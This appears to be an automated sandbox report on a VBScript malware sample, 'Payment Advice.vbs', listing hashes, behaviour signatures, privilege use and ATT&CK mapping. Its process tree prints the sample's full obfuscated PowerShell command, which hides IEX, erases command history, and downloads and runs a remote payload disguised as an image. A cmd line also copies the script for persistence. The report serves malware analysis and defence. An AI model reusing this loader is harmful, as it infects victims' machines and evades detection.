6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6

General

Target

Payment Advice.vbs
Size

4KB
MD5

afccc71a981fa3ea99bf0af6cbbfac4d
SHA1

125e81caad716d88d4be375c125156a673d1ecb0
SHA256

6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6
SHA512

0ea2d841cb7f3a55a6304b1784adecc7e87aa43676583c67084dafe2d702267165873031ac3fd2f5e7aced18aba36a6a5283b03eca2cb754a75fb0ce65955fdd

Score

8^/10

ransomware

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 3736 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3736 powershell.exe
3736 powershell.exe
3736 powershell.exe

flow	pid	process
12	3736	powershell.exe

pid	process
3736	powershell.exe
3736	powershell.exe
3736	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeIncreaseQuotaPrivilege	3736	powershell.exe
Token: SeSecurityPrivilege	3736	powershell.exe
Token: SeTakeOwnershipPrivilege	3736	powershell.exe
Token: SeLoadDriverPrivilege	3736	powershell.exe
Token: SeSystemProfilePrivilege	3736	powershell.exe
Token: SeSystemtimePrivilege	3736	powershell.exe
Token: SeProfSingleProcessPrivilege	3736	powershell.exe
Token: SeIncBasePriorityPrivilege	3736	powershell.exe
Token: SeCreatePagefilePrivilege	3736	powershell.exe
Token: SeBackupPrivilege	3736	powershell.exe
Token: SeRestorePrivilege	3736	powershell.exe
Token: SeShutdownPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeSystemEnvironmentPrivilege	3736	powershell.exe
Token: SeRemoteShutdownPrivilege	3736	powershell.exe
Token: SeUndockPrivilege	3736	powershell.exe
Token: SeManageVolumePrivilege	3736	powershell.exe
Token: 33	3736	powershell.exe
Token: 34	3736	powershell.exe
Token: 35	3736	powershell.exe
Token: 36	3736	powershell.exe
Token: SeIncreaseQuotaPrivilege	3736	powershell.exe
Token: SeSecurityPrivilege	3736	powershell.exe
Token: SeTakeOwnershipPrivilege	3736	powershell.exe
Token: SeLoadDriverPrivilege	3736	powershell.exe
Token: SeSystemProfilePrivilege	3736	powershell.exe
Token: SeSystemtimePrivilege	3736	powershell.exe
Token: SeProfSingleProcessPrivilege	3736	powershell.exe
Token: SeIncBasePriorityPrivilege	3736	powershell.exe
Token: SeCreatePagefilePrivilege	3736	powershell.exe
Token: SeBackupPrivilege	3736	powershell.exe
Token: SeRestorePrivilege	3736	powershell.exe
Token: SeShutdownPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeSystemEnvironmentPrivilege	3736	powershell.exe
Token: SeRemoteShutdownPrivilege	3736	powershell.exe
Token: SeUndockPrivilege	3736	powershell.exe
Token: SeManageVolumePrivilege	3736	powershell.exe
Token: 33	3736	powershell.exe
Token: 34	3736	powershell.exe
Token: 35	3736	powershell.exe
Token: 36	3736	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 4804 wrote to memory of 3736	4804	WScript.exe	powershell.exe
PID 4804 wrote to memory of 3736	4804	WScript.exe	powershell.exe
PID 4804 wrote to memory of 3188	4804	WScript.exe	cmd.exe
PID 4804 wrote to memory of 3188	4804	WScript.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$RtTaPrCxkdwhsjhbPUin='Q4)QF)20)7B)24)70)Q9)QE)Q7)20)3D)20)74)QO)73)74)2D)Q3)QF)QE)QE)QO)Q3)74)Q9)QF)QE)20)2D)Q3)QF)QD)70)20)Q7)QF)QF)Q7)QC)QO)2E)Q3)QF)QD)20)2D)Q3)QF)7O)QE)74)20)31)20)2D)O1)7O)Q9)QO)74)7D)20)7O)QE)74)Q9)QC)20)28)24)70)Q9)QE)Q7)29)3B)24)74)3O)3Q)QQ)Q7)20)3D)20)OB)4O)QE)7O)QD)OD)3A)3A)O4)QF)4F)Q2)QA)QO)Q3)74)28)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)O4)79)70)QO)OD)2C)20)33)30)37)32)29)3B)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)72)7Q)Q9)Q3)QO)O0)QF)Q9)QE)74)4D)Q1)QE)Q1)Q7)QO)72)OD)3A)3A)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)20)3D)20)24)74)3O)3Q)QQ)Q7)3B)OB)O2)QO)QQ)OD)2E)41)73)73)QO)QD)Q2)QC)79)2E)47)QO)74)O4)79)70)QO)28)27)O3)79)27)2B)27)73)74)QO)QD)2E)27)2B)27)4D)Q1)QE)Q1)27)2B)27)Q7)QO)QD)27)2B)27)QO)QE)74)27)2B)27)2E)41)7O)74)QF)QD)27)2B)27)Q1)74)Q9)QF)27)2B)27)QE)2E)41)27)2B)27)QD)27)2B)27)73)Q9)27)2B)27)OO)74)Q9)QC)73)27)29)2E)47)QO)74)4Q)Q9)QO)QC)Q4)28)27)Q1)27)2B)27)QD)73)27)2B)27)Q9)49)27)2B)27)QE)Q9)74)4Q)Q1)27)2B)27)Q9)QC)QO)Q4)27)2C)27)4E)QF)QE)40)40)40)27)2E)72)QO)70)QC)Q1)Q3)QO)28)27)40)40)40)27)2C)27)O0)7O)Q2)27)29)2B)27)QC)Q9)Q3)2C)O3)27)2B)27)74)Q1)74)Q9)Q3)27)29)2E)O3)QO)74)OQ)Q1)QC)7O)QO)28)24)QE)7O)QC)QC)2C)24)74)72)7O)QO)29)3B)24)74)74)79)3D)27)28)4E)QO)77)2D)27)2B)27)4F)Q2)QA)QO)27)2B)27)Q3)74)20)4E)QO)27)2B)27)74)2E)O7)QO)27)2B)27)Q2)43)QC)Q9)27)2B)27)QO)QE)74)29)27)7C)49)Q0)4O)Q0)O8)3B)OB)7Q)QF)Q9)Q4)OD)20)OB)O3)79)73)74)QO)QD)2E)O2)QO)QQ)QC)QO)Q3)74)Q9)QF)QE)2E)41)73)73)QO)QD)Q2)QC)79)OD)3A)3A)4C)QF)Q1)Q4)O7)Q9)74)Q8)O0)Q1)72)74)Q9)Q1)QC)4E)Q1)QD)QO)28)27)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)27)29)3B)24)QD)7Q)3D)20)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)49)QE)74)QO)72)Q1)Q3)74)Q9)QF)QE)OD)3A)3A)43)Q1)QC)QC)42)79)QE)Q1)QD)QO)28)24)74)74)79)2C)27)44)QF)77)QE)QC)QF)Q1)Q4)O3)74)72)Q9)QE)Q7)27)2C)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)43)Q1)QC)QC)O4)79)70)QO)OD)3A)3A)4D)QO)74)Q8)QF)Q4)2C)27)Q8)74)74)70)3A)2F)2F)Q1)Q3)Q8)2D)QO)Q4)Q9)2E)78)79)7A)2F)4D)QF)QE)74)Q8)QC)79)O0)Q1)79)72)QF)QC)QC)2F)4A)Q1)QE)7O)Q1)72)79)2E)QA)70)Q7)27)29)3B)24)72)37)38)QQ)Q4)30)30)30)73)Q4)3D)20)24)QD)7Q)20)2D)73)70)QC)Q9)74)20)27)2O)27)20)7C)4Q)QF)72)4O)Q1)Q3)Q8)2D)4F)Q2)QA)QO)Q3)74)20)7B)OB)Q3)Q8)Q1)72)OD)OB)Q2)79)74)QO)OD)22)30)78)24)OF)22)7D)3B)24)79)3O)QA)Q8)3Q)32)Q4)QQ)30)3D)20)24)72)37)38)QQ)Q4)30)30)30)73)Q4)20)2D)QA)QF)Q9)QE)20)27)27)7C)49)Q0)4O)Q0)O8'.replace('O','5').replace('Q','6');$DFG45DFG0=$RtTaPrCxkdwhsjhbPUin.Split(')') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs" "C:\Users\Admin\AppData\Local" /Y
2⤵
PID:3188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3188-3-0x0000000000000000-mapping.dmp

Download
memory/3736-2-0x0000000000000000-mapping.dmp

Download
memory/3736-4-0x00007FFA610F0000-0x00007FFA61ADC000-memory.dmp

Filesize
9.9MB

Download
memory/3736-5-0x00000161E42D0000-0x00000161E42D1000-memory.dmp

Filesize
4KB

Download
memory/3736-6-0x00000161E4400000-0x00000161E4401000-memory.dmp

Filesize
4KB

Download
memory/3736-7-0x00000161E4250000-0x00000161E4251000-memory.dmp

Filesize
4KB

Download
memory/3736-8-0x00000161E2210000-0x00000161E2212000-memory.dmp

Filesize
8KB

Download
memory/3736-9-0x00000161E2213000-0x00000161E2215000-memory.dmp

Filesize
8KB

Download
memory/3736-10-0x00000161E2216000-0x00000161E2218000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing